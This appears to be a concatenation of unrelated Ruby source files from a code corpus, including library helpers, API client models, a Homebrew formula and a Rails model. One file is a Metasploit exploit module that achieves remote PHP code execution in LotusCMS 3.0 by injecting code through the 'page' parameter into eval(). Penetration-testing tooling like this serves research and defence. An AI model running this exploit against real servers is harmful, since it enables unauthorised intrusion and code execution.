# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata['allowed_push_host'] = "TODO: Set to 'http://mygemserver.com'"
else
raise "RubyGems 2.0 or newer is required to protect against public gem pushes."
end
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_runtime_dependency 'activesupport'
spec.add_runtime_dependency 'dotenv'
spec.add_runtime_dependency 'ruby-trello'
spec.add_runtime_dependency 'thor'
spec.add_development_dependency "bundler", "~> 1.12"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
end
| 38.657895 | 104 | 0.6855 |
e819897e2d3eb2d547e2403b38b32f585e953931 | 883 | # TODO: Get these added to the `pretty_ruby` gem, and use that. (Note that it uses refinements, not monkey-patching.)
module Enumerable
# Allow Scheme-style `rest`.
def rest(count = 1)
drop(count)
end
# Allow Scheme-style `tail`.
def tail
return self if size.zero?
last(size - 1)
end
# Returns `true` iff all the elements are equal. Returns `false` if there are no elements.
def same?
uniq.size == 1
end
# Like `first` or `last`, but *requires* that there be exactly one element.
def only
fail IndexError, "expected to have exactly 1 element" unless size == 1
first
end
# Allow Rails-style `second`.
def second
self[1]
end
# Prefer 1-based indexing to get the `nth` element.
def nth(n) # rubocop:disable Naming/MethodParameterName
self[n - 1]
end
def map_dig(*args)
map{ |a| a.dig(*args) }
end
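# Illustrative usage on arrays (the hash keys below are made up):
#
#   [{ a: { b: 1 } }, { a: { b: 2 } }].map_dig(:a, :b)  # => [1, 2]
#   [10, 20, 30].nth(2)                                 # => 20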
end
| 21.02381 | 117 | 0.657984 |
1a13c565ed636e753e38dffc736e950c49ee7e54 | 4,278 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WmapScanUniqueQuery
def initialize(info = {})
super(update_info(info,
'Name' => 'LotusCMS 3.0 eval() Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability found in Lotus CMS 3.0's Router()
function. This is done by embedding PHP code in the 'page' parameter,
which will be passed to a eval call, therefore allowing remote code execution.
The module can either automatically pick up a 'page' parameter from the
default page, or manually specify one in the URI option. To use the automatic
method, please supply the URI with just a directory path, for example: "/lcms/".
To manually configure one, you may do: "/lcms/somepath/index.php?page=index"
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alligator Security Team',
'dflah_ <dflah_[at]alligatorteam.org>',
'sherl0ck_ <sherl0ck_[at]alligatorteam.org>',
'sinn3r' #Metasploit-fu
],
'References' =>
[
[ 'OSVDB', '75095' ],
[ 'URL', 'http://secunia.com/secunia_research/2011-21/' ]
],
'Payload' =>
{
'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
'DisableNops' => true,
'BadChars' => "#",
'Keys' => ['php']
},
'Platform' => [ 'php' ],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic LotusCMS 3.0', { }]],
'Privileged' => false,
'DisclosureDate' => 'Mar 3 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, 'URI', '/lcms/']),
Opt::RPORT(80),
], self.class)
end
def target_url
uri = datastore['URI']
# Make sure uri begins with '/'
if uri[0] != '/'
uri = '/' + uri
end
# Extract two things:
# 1. The file path (/index.php), including the base
# 2. GET parameters from the GET query
uri = uri.scan(/^(\/.+)\/(\w+\.php)*\?*(\w+=.+&*)*$/).flatten
base = (uri[0] || "") + '/'
fname = uri[1] || ""
query = uri[2] || ""
params = queryparse(query) rescue ""
# Use the user-supplied query if there's one, if not we'll auto-detect
# by regexing a hyper-link
if base.empty? or fname.empty? or params.empty?
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['URI']
}, 20)
if res and res.code == 200
uri = res.body.scan(/<a.*href=['|"](\/*index\.php)\?.*(page=\w+)['|"].*>/).flatten
@uri = base + uri[0]
@arg = uri[1]
print_status("Using found page param: #{@uri}?#{@arg}")
else
@uri = ""
@arg = ""
end
else
@uri = base + fname
@arg = "page=#{params['page']}"
end
end
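# Illustrative example of what the regex in target_url extracts when URI is
# set to "/lcms/index.php?page=index" (a made-up path):
#   base => "/lcms/", fname => "index.php", query => "page=index"
# which yields @uri = "/lcms/index.php" and @arg = "page=index".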
def check
target_url
if @uri.empty? or @arg.empty?
print_error("Unable to get the page parameter, please reconfigure URI")
return
end
signature = rand_text_alpha(rand(10)+10)
stub = "${print('#{signature}')};"
sploit = "');#{stub}#"
response = send_request_cgi(
{
'method' => 'POST',
'uri' => @uri,
'data' => @arg + Rex::Text.uri_encode(sploit)
}, 20)
if response and response.body =~ /#{signature}/
print_status("Signature: #{signature}")
return Exploit::CheckCode::Vulnerable
else
print_error("Signature was not detected")
return Exploit::CheckCode::Safe
end
end
def exploit
return if not check == Exploit::CheckCode::Vulnerable
begin
sploit = "');#{payload.encoded}#"
print_status("Sending exploit ...")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => @uri,
'data' => @arg + Rex::Text.uri_encode(sploit)
}, 20)
handler
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end | 29.102041 | 87 | 0.583918 |
610dd9c3372923da29966a454b10bb6ba302dcb6 | 9,041 | =begin
#The Plaid API
#The Plaid REST API. Please see https://plaid.com/docs/api for more details.
The version of the OpenAPI document: 2020-09-14_1.64.13
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.1.0
=end
require 'date'
require 'time'
module Plaid
# The rationale for Plaid's decision regarding a proposed transfer. Will be null for `approved` decisions.
class TransferAuthorizationDecisionRationale
# A code representing the rationale for permitting or declining the proposed transfer. Possible values are: `NSF` – Transaction likely to result in a return due to insufficient funds. `RISK` - Transaction is high-risk. `MANUALLY_VERIFIED_ITEM` – Item created via same-day micro deposits, limited information available. Plaid can only offer `permitted` as a transaction decision. `LOGIN_REQUIRED` – Unable to collect the account information required for an authorization decision due to Item staleness. Can be rectified using Link update mode. `ERROR` – Unable to collect the account information required for an authorization decision due to an error.
attr_accessor :code
# A human-readable description of the code associated with a permitted transfer or transfer decline.
attr_accessor :description
class EnumAttributeValidator
attr_reader :datatype
attr_reader :allowable_values
def initialize(datatype, allowable_values)
@allowable_values = allowable_values.map do |value|
case datatype.to_s
when /Integer/i
value.to_i
when /Float/i
value.to_f
else
value
end
end
end
def valid?(value)
!value || allowable_values.include?(value)
end
end
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'code' => :'code',
:'description' => :'description'
}
end
# Returns all the JSON keys this model knows about
def self.acceptable_attributes
attribute_map.values
end
# Attribute type mapping.
def self.openapi_types
{
:'code' => :'String',
:'description' => :'String'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `Plaid::TransferAuthorizationDecisionRationale` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `Plaid::TransferAuthorizationDecisionRationale`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'code')
self.code = attributes[:'code']
end
if attributes.key?(:'description')
self.description = attributes[:'description']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @code.nil?
invalid_properties.push('invalid value for "code", code cannot be nil.')
end
if @description.nil?
invalid_properties.push('invalid value for "description", description cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @code.nil?
code_validator = EnumAttributeValidator.new('String', ["NSF", "RISK", "MANUALLY_VERIFIED_ITEM", "LOGIN_REQUIRED", "ERROR"])
return false unless code_validator.valid?(@code)
return false if @description.nil?
true
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] code Object to be assigned
def code=(code)
validator = EnumAttributeValidator.new('String', ["NSF", "RISK", "MANUALLY_VERIFIED_ITEM", "LOGIN_REQUIRED", "ERROR"])
unless validator.valid?(code)
fail ArgumentError, "invalid value for \"code\", must be one of #{validator.allowable_values}."
end
@code = code
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
code == o.code &&
description == o.description
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[code, description].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
elsif type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :Time
Time.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
# models (e.g. Pet) or oneOf
klass = Plaid.const_get(type)
klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 32.876364 | 659 | 0.641301 |
1d0637fef0cbc42a0f6274d58a773657d0885d76 | 2,555 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# Source: google/ads/googleads/v9/services/feed_item_set_link_service.proto for package 'Google.Ads.GoogleAds.V9.Services'
# Original file comments:
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'grpc'
require 'google/ads/google_ads/v9/services/feed_item_set_link_service_pb'
module Google
module Ads
module GoogleAds
module V9
module Services
module FeedItemSetLinkService
# Proto file describing the FeedItemSetLink service.
#
# Service to manage feed item set links.
class Service
include ::GRPC::GenericService
self.marshal_class_method = :encode
self.unmarshal_class_method = :decode
self.service_name = 'google.ads.googleads.v9.services.FeedItemSetLinkService'
# Returns the requested feed item set link in full detail.
#
# List of thrown errors:
# [AuthenticationError]()
# [AuthorizationError]()
# [HeaderError]()
# [InternalError]()
# [QuotaError]()
# [RequestError]()
rpc :GetFeedItemSetLink, ::Google::Ads::GoogleAds::V9::Services::GetFeedItemSetLinkRequest, ::Google::Ads::GoogleAds::V9::Resources::FeedItemSetLink
# Creates, updates, or removes feed item set links.
#
# List of thrown errors:
# [AuthenticationError]()
# [AuthorizationError]()
# [HeaderError]()
# [InternalError]()
# [QuotaError]()
# [RequestError]()
rpc :MutateFeedItemSetLinks, ::Google::Ads::GoogleAds::V9::Services::MutateFeedItemSetLinksRequest, ::Google::Ads::GoogleAds::V9::Services::MutateFeedItemSetLinksResponse
end
Stub = Service.rpc_stub_class
end
end
end
end
end
end
| 37.573529 | 184 | 0.625832 |
d5e56c4a8bf4738e91e82e7d840b03c141532c4e | 1,947 | class PostVote < ApplicationRecord
class Error < Exception ; end
belongs_to :post
belongs_to :user
attr_accessor :vote
after_initialize :initialize_attributes, if: :new_record?
validates_presence_of :score
validates_inclusion_of :score, :in => [SuperVoter::MAGNITUDE, 1, -1, -SuperVoter::MAGNITUDE]
after_create :update_post_on_create
after_destroy :update_post_on_destroy
def self.positive_user_ids
select_values_sql("select user_id from post_votes where score > 0 group by user_id having count(*) > 100")
end
def self.negative_post_ids(user_id)
select_values_sql("select post_id from post_votes where score < 0 and user_id = ?", user_id)
end
def self.positive_post_ids(user_id)
select_values_sql("select post_id from post_votes where score > 0 and user_id = ?", user_id)
end
def self.visible(user = CurrentUser.user)
return all if user.is_admin?
where(user: user)
end
def self.search(params)
q = super
q = q.visible
q = q.search_attributes(params, :post, :user, :score)
q.apply_default_order(params)
end
def initialize_attributes
self.user_id ||= CurrentUser.user.id
if vote == "up"
self.score = magnitude
elsif vote == "down"
self.score = -magnitude
end
end
def update_post_on_create
if score > 0
Post.where(:id => post_id).update_all("score = score + #{score}, up_score = up_score + #{score}")
else
Post.where(:id => post_id).update_all("score = score + #{score}, down_score = down_score + #{score}")
end
end
def update_post_on_destroy
if score > 0
Post.where(:id => post_id).update_all("score = score - #{score}, up_score = up_score - #{score}")
else
Post.where(:id => post_id).update_all("score = score - #{score}, down_score = down_score - #{score}")
end
end
def magnitude
if user.is_super_voter?
SuperVoter::MAGNITUDE
else
1
end
end
end
| 27.041667 | 110 | 0.684643 |
116899b0adb956cdaa7b80db381ef85efa5776d6 | 286 | require_relative '../../spec_helper'
describe "Complex#marshal_dump" do
it "is a private method" do
Complex.should have_private_instance_method(:marshal_dump, false)
end
it "dumps real and imaginary parts" do
Complex(1, 2).send(:marshal_dump).should == [1, 2]
end
end
| 23.833333 | 69 | 0.72028 |
1d2a5e9c746b9f5c977dadaeef5f1e7ba1746d7b | 966 | require 'pg'
require 'date'
now = DateTime.now
con = PG.connect(:dbname => "#{$evm.object['db_database']}",
:user => "#{$evm.object['db_user']}",
:password => "#{$evm.object.decrypt('db_password')}",
:host => "#{$evm.object['db_hostname']}" )
res = con.exec "select hostname,ipaddr from hosts where allocated = FALSE and provisioning = FALSE limit 1;"
if res.ntuples > 0 then
$evm.log(:info, "Found an available hostname and ip address: #{res.first['hostname']} :: #{res.first['ipaddr']}")
update = con.exec "update hosts set provisioning = TRUE , mod_date = \'#{now.year()}-#{now.mon()}-#{now.mday()} #{now.hour()}:#{now.min()}:#{now.sec()}\' where hostname = \'#{res.first['hostname']}\';"
else
$evm.log(:info, "Couldn't get a hostname from the database")
exit MIQ_ERROR
end
$evm.object.options[:vm_target_name] = "#{res.first['hostname']}"
$evm.object.options[:vm_target_hostname] = "#{res.first['hostname']}"
| 43.909091 | 203 | 0.620083 |
873668165940b6ca1316c3d83292d4f598862110 | 144 | # Be sure to restart your server when you modify this file.
DummyApp::Application.config.session_store :cookie_store, key: '_finishes_session'
| 36 | 82 | 0.805556 |
62ccd2b9ec5de36d63c60255897da1e78903d6d8 | 589 | name 'graphite'
maintainer 'Sous Chefs'
maintainer_email '[email protected]'
license 'Apache-2.0'
description 'Installs/Configures graphite'
long_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))
version '1.0.7'
supports 'ubuntu'
supports 'debian'
supports 'redhat'
supports 'centos'
supports 'scientific'
supports 'oracle'
depends 'poise-python', '~> 1.7.0'
source_url 'https://github.com/sous-chefs/graphite'
issues_url 'https://github.com/sous-chefs/graphite/issues'
chef_version '>= 12.11' if respond_to?(:chef_version)
| 28.047619 | 72 | 0.711375 |
ed028d6282fd3a71f1e878905eab1967b361293f | 6,061 | require 'formula'
# NOTE: When updating Wine, please check Wine-Gecko and Wine-Mono for updates too:
# http://wiki.winehq.org/Gecko
# http://wiki.winehq.org/Mono
class Wine < Formula
homepage 'http://winehq.org/'
stable do
url 'http://downloads.sourceforge.net/project/wine/Source/wine-1.6.tar.bz2'
sha256 'e1f130efbdcbfa211ca56ee03357ccd17a31443889b4feebdcb88248520b42ae'
depends_on 'little-cms'
end
devel do
url 'http://downloads.sourceforge.net/project/wine/Source/wine-1.7.5.tar.bz2'
sha256 '355c2980c457f7d714132fcf7008fcb9ad185295bdd9f0681e9123d839952823'
depends_on 'little-cms2'
end
head do
url 'git://source.winehq.org/git/wine.git'
depends_on 'little-cms2'
end
env :std
# note that all wine dependencies should declare a --universal option in their formula,
# otherwise homebrew will not notice that they are not built universal
require_universal_deps
# Wine will build both the Mac and the X11 driver by default, and you can switch
# between them. But if you really want to build without X11, you can.
depends_on :x11 => :recommended
depends_on 'freetype' if build.without? 'x11'
depends_on 'jpeg'
depends_on 'libgphoto2'
depends_on 'libicns'
depends_on 'libtiff'
depends_on 'sane-backends'
depends_on 'libgsm' => :optional
resource 'gecko' do
url 'http://downloads.sourceforge.net/wine/wine_gecko-2.24-x86.msi', :using => :nounzip
version '2.24'
sha1 'b4923c0565e6cbd20075a0d4119ce3b48424f962'
end
resource 'mono' do
url 'http://downloads.sourceforge.net/wine/wine-mono-0.0.8.msi', :using => :nounzip
sha1 'dd349e72249ce5ff981be0e9dae33ac4a46a9f60'
end
fails_with :llvm do
build 2336
cause 'llvm-gcc does not respect force_align_arg_pointer'
end
fails_with :clang do
build 421
cause 'error: invalid operand for instruction lretw'
end
def patches
p = []
if build.stable?
# http://bugs.winehq.org/show_bug.cgi?id=34188
p << 'http://bugs.winehq.org/attachment.cgi?id=45507'
# http://bugs.winehq.org/show_bug.cgi?id=34162
p << 'http://bugs.winehq.org/attachment.cgi?id=45562' if MacOS.version >= :mavericks
end
if build.devel?
# http://bugs.winehq.org/show_bug.cgi?id=34166
p << 'http://bugs.winehq.org/attachment.cgi?id=46394'
end
p
end
# the following libraries are currently not specified as dependencies, or not built as 32-bit:
# configure: libv4l, gstreamer-0.10, libcapi20, libgsm
# Wine loads many libraries lazily using dlopen calls, so it needs these paths
# to be searched by dyld.
# Including /usr/lib because wine, as of 1.3.15, tries to dlopen
# libncurses.5.4.dylib, and fails to find it without the fallback path.
def wine_wrapper; <<-EOS.undent
#!/bin/sh
DYLD_FALLBACK_LIBRARY_PATH="#{library_path}" "#{bin}/wine.bin" "$@"
EOS
end
def install
# Build 32-bit; Wine doesn't support 64-bit host builds on OS X.
build32 = "-arch i386 -m32"
ENV.append "CFLAGS", build32
ENV.append "LDFLAGS", build32
# The clang that comes with Xcode 5 no longer miscompiles wine. Tested with 1.7.3.
if ENV.compiler == :clang and MacOS.clang_build_version < 500
opoo <<-EOS.undent
Clang currently miscompiles some parts of Wine.
If you have GCC, you can get a more stable build with:
brew install wine --cc=gcc-4.2 # or 4.7, 4.8, etc.
EOS
end
# Workarounds for XCode not including pkg-config files
ENV.libxml2
ENV.append "LDFLAGS", "-lxslt"
# Note: we get freetype from :x11, but if the freetype formula has been installed
# separately and not built universal, it's going to get picked up and break the build.
# We cannot use FREETYPE_LIBS because it is inserted after LDFLAGS and thus cannot
# take precedence over the homebrew freetype.
ENV.prepend "LDFLAGS", "-L#{MacOS::X11.lib}" unless build.without? 'x11'
args = ["--prefix=#{prefix}"]
args << "--disable-win16" if MacOS.version <= :leopard or ENV.compiler == :clang
# 64-bit builds of mpg123 are incompatible with 32-bit builds of Wine
args << "--without-mpg123" if Hardware.is_64_bit?
args << "--without-x" if build.without? 'x11'
system "./configure", *args
unless ENV.compiler == :clang or ENV.compiler == :llvm
# The Mac driver uses blocks and must be compiled with clang even if the rest of
# Wine is built with gcc. This must be done after configure.
system 'make', 'dlls/winemac.drv/Makefile'
inreplace 'dlls/winemac.drv/Makefile', /^CC\s*=\s*[^\s]+/, "CC = clang"
end
system "make install"
(share/'wine/gecko').install resource('gecko')
(share/'wine/mono').install resource('mono')
# Use a wrapper script, so rename wine to wine.bin
# and name our startup script wine
mv bin/'wine', bin/'wine.bin'
(bin/'wine').write(wine_wrapper)
# Don't need Gnome desktop support
(share/'applications').rmtree
end
def caveats
s = <<-EOS.undent
You may want to get winetricks:
brew install winetricks
The current version of Wine contains a partial implementation of dwrite.dll
which may cause text rendering issues in applications such as Steam.
We recommend that you run winecfg, add an override for dwrite in the
Libraries tab, and edit the override mode to "disable". See:
http://bugs.winehq.org/show_bug.cgi?id=31374
EOS
unless build.without? 'x11'
s += <<-EOS.undent
By default Wine uses a native Mac driver. To switch to the X11 driver, use
regedit to set the "graphics" key under "HKCU\\Software\\Wine\\Drivers" to
"x11" (or use winetricks).
For best results with X11, install the latest version of XQuartz:
http://xquartz.macosforge.org/
EOS
end
return s
end
private
def library_path
paths = ["#{HOMEBREW_PREFIX}/lib", '/usr/lib']
paths.unshift(MacOS::X11.lib) unless build.without? 'x11'
paths.join(':')
end
end
| 32.940217 | 96 | 0.6852 |
33debfb8700744f8221391bbe4581a66aadc2911 | 907 | module NavigationHelpers
# Maps a name to a path. Used by the
#
# When /^I go to (.+)$/ do |page_name|
#
# step definition in web_steps.rb
#
def path_to(page_name)
case page_name
when /the home\s?page/
'/'
when /the new post page/
new_post_path
when /the sign up page/
new_user_registration_path
# Add more mappings here.
# Here is an example that pulls values out of the Regexp:
#
# when /^(.*)'s profile page$/i
# user_profile_path(User.find_by_login($1))
else
begin
page_name =~ /the (.*) page/
path_components = $1.split(/\s+/)
self.send(path_components.push('path').join('_').to_sym)
rescue Object => e
raise "Can't find mapping from \"#{page_name}\" to a path.\n" +
"Now, go and add a mapping in #{__FILE__}"
end
end
end
end
World(NavigationHelpers)
| 23.25641 | 71 | 0.593164 |
6a103c575c8914b3f59d38096f22e1e7f70a661c | 4,179 | # frozen_string_literal: true
require "rails_helper"
RSpec.describe ChangeSetPersister::UpdateAspaceDao do
let(:shoulder) { "99999/fk4" }
let(:blade) { "123456" }
with_queue_adapter :inline
it "updates ASpace with a new DAO when an item is marked complete" do
stub_aspace_login
stub_find_archival_object(component_id: "MC001.01_c000001")
stub_aspace(pulfa_id: "MC001.01_c000001")
stub_ezid(shoulder: shoulder, blade: blade)
mocked_digital_object_create = stub_create_digital_object
mocked_archival_object_update = stub_archival_object_update(archival_object_id: "260330")
change_set_persister = ChangeSetPersister.default
resource = FactoryBot.create_for_repository(:scanned_resource, source_metadata_identifier: "MC001.01_c000001")
change_set = ChangeSet.for(resource)
change_set.validate(state: "complete")
expect(change_set).to be_valid
change_set_persister.save(change_set: change_set)
# Ensure the digital object was made.
expect(mocked_digital_object_create).to have_been_made
expect(mocked_digital_object_create.with { |req| req.body.include?("http://www.example.com/concern/scanned_resources/#{change_set.id}/manifest") }).to have_been_made
# Ensure the archival object was linked to the digital object.
expect(mocked_archival_object_update).to have_been_made
end
it "adds a download link as the DAO if it's a zip file" do
stub_aspace_login
stub_find_archival_object(component_id: "MC001.01_c000001")
stub_aspace(pulfa_id: "MC001.01_c000001")
stub_ezid(shoulder: shoulder, blade: blade)
mocked_digital_object_create = stub_create_digital_object
mocked_archival_object_update = stub_archival_object_update(archival_object_id: "260330")
# Stub preservation since we have a stubbed FileSet with no real content to
# preserve.
allow(PreserveResourceJob).to receive(:perform_later)
change_set_persister = ChangeSetPersister.default
zip_file_set = FactoryBot.create_for_repository(:zip_file_set)
resource = FactoryBot.create_for_repository(:scanned_resource, source_metadata_identifier: "MC001.01_c000001", member_ids: zip_file_set.id)
change_set = ChangeSet.for(resource)
change_set.validate(state: "complete")
expect(change_set).to be_valid
change_set_persister.save(change_set: change_set)
# Ensure the digital object was made.
expect(mocked_digital_object_create).to have_been_made
expect(mocked_digital_object_create.with { |req| req.body.include?("http://www.example.com/downloads/#{zip_file_set.id}/file/#{zip_file_set.original_file.id}") }).to have_been_made
# Ensure the archival object was linked to the digital object.
expect(mocked_archival_object_update).to have_been_made
end
it "overrides previous Figgy DAO" do
stub_aspace_login
stub_find_archival_object(component_id: "MC230_c117")
stub_find_digital_object(ref: "/repositories/3/digital_objects/12331")
stub_aspace(pulfa_id: "MC230_c117")
stub_ezid(shoulder: shoulder, blade: blade)
mocked_digital_object_create = stub_create_digital_object
mocked_archival_object_update = stub_archival_object_update(archival_object_id: "298998")
change_set_persister = ChangeSetPersister.default
resource = FactoryBot.create_for_repository(:scanned_resource, source_metadata_identifier: "MC230_c117")
change_set = ChangeSet.for(resource)
change_set.validate(state: "complete")
expect(change_set).to be_valid
change_set_persister.save(change_set: change_set)
# Ensure the digital object was made.
expect(mocked_digital_object_create.with { |req| req.body.include?("http://www.example.com/concern/scanned_resources/#{change_set.id}/manifest") }).to have_been_made
expect(mocked_archival_object_update).to have_been_made
# Ensure the old figgy URI isn't in there.
expect(mocked_archival_object_update.with { |req| req.body.include?("/repositories/3/digital_objects/12331") })
.not_to have_been_made
# Ensure the other instances aren't lost.
expect(mocked_archival_object_update.with { |req| req.body.include?("mixed_materials") })
.to have_been_made
end
end
| 50.963415 | 184 | 0.78057 |
26d82506ade45d6bf08506723bf130f8806e5ec4 | 1,155 | require_relative '../lib/credit_card'
require 'minitest/autorun'
describe 'Test hashing requirements' do
before do
@cc1 = CreditCard.new('4916603231464963', 'Mar-30-2020',
'Soumya Ray', 'Visa')
@cc2 = CreditCard.new('4916603231464963', 'Mar-30-2020',
'Soumya Ray', 'Visa')
@cc3 = CreditCard.new('5423661657234057', 'Feb-30-2020',
'Soumya Ray', 'Mastercard')
end
describe 'Test regular hashing' do
it 'should find the same hash for identical cards' do
@cc1.hash.must_equal @cc2.hash
end
it 'should produce different hashes for different information' do
@cc1.hash.wont_equal @cc3.hash
end
end
describe 'Test cryptographic hashing' do
it 'should find the same hash for identical cards' do
@cc1.hash_secure.must_equal @cc2.hash_secure
end
it 'should produce different hashes for different information' do
@cc1.hash_secure.wont_equal @cc3.hash_secure
end
it 'should not produce the same regular vs. cryptographic hash' do
@cc1.hash.to_s.wont_equal @cc1.hash_secure.to_s
end
end
end
| 30.394737 | 70 | 0.658009 |
1c552939db1b5d77ef69d26ee788f252c766f926 | 2,765 | # frozen_string_literal: true
require 'bundler'
module LicenseFinder
class Bundler < PackageManager
def initialize(options = {})
super
@ignored_groups = options[:ignored_groups]
@definition = options[:definition] # dependency injection for tests
end
def current_packages
logger.debug self.class, "including groups #{included_groups.inspect}"
details.map do |gem_detail, bundle_detail|
BundlerPackage.new(gem_detail, bundle_detail, logger: logger).tap do |package|
log_package_dependencies package
end
end
end
def package_management_command
'bundle'
end
def prepare_command
ignored_groups_argument = !ignored_groups.empty? ? "--without #{ignored_groups.to_a.join(' ')}" : ''
"bundle install #{ignored_groups_argument}".strip
end
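# Illustrative example: with ignored_groups = ["development", "test"] the
# command becomes "bundle install --without development test"; with no
# ignored groups it is just "bundle install".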
def possible_package_paths
[project_path.join(gemfile)]
end
private
attr_reader :ignored_groups
def definition
# DI
ENV['BUNDLE_PATH'] = project_path.to_s
ENV['BUNDLE_GEMFILE'] = "#{project_path}/#{gemfile}"
@definition ||= ::Bundler::Definition.build(detected_package_path, lockfile_path, nil)
end
def details
gem_details.map do |gem_detail|
bundle_detail = bundler_details.detect { |bundler_detail| bundler_detail.name == gem_detail.name }
[gem_detail, bundle_detail]
end
end
def gem_details
return @gem_details if @gem_details
# clear gem paths before running specs_for
Gem.clear_paths
if bundler_config_path_found
::Bundler.reset!
::Bundler.configure
end
@gem_details = definition.specs_for(included_groups)
end
def bundler_details
@bundler_details ||= definition.dependencies
end
def included_groups
definition.groups - ignored_groups.map(&:to_sym)
end
def lockfile_path
project_path.join(lockfile)
end
def bundler_config_path_found
config_file = project_path.join('.bundle/config')
return false unless File.exist?(config_file)
content = File.readlines(config_file)
content.grep(/BUNDLE_PATH/).count.positive?
end
def log_package_dependencies(package)
dependencies = package.children
if dependencies.empty?
logger.debug self.class, format("package '%s' has no dependencies", package.name)
else
logger.debug self.class, format("package '%s' has dependencies:", package.name)
dependencies.each do |dep|
logger.debug self.class, format('- %s', dep)
end
end
end
def gemfile
File.basename(ENV['BUNDLE_GEMFILE'] || 'Gemfile')
end
def lockfile
"#{gemfile}.lock"
end
end
end
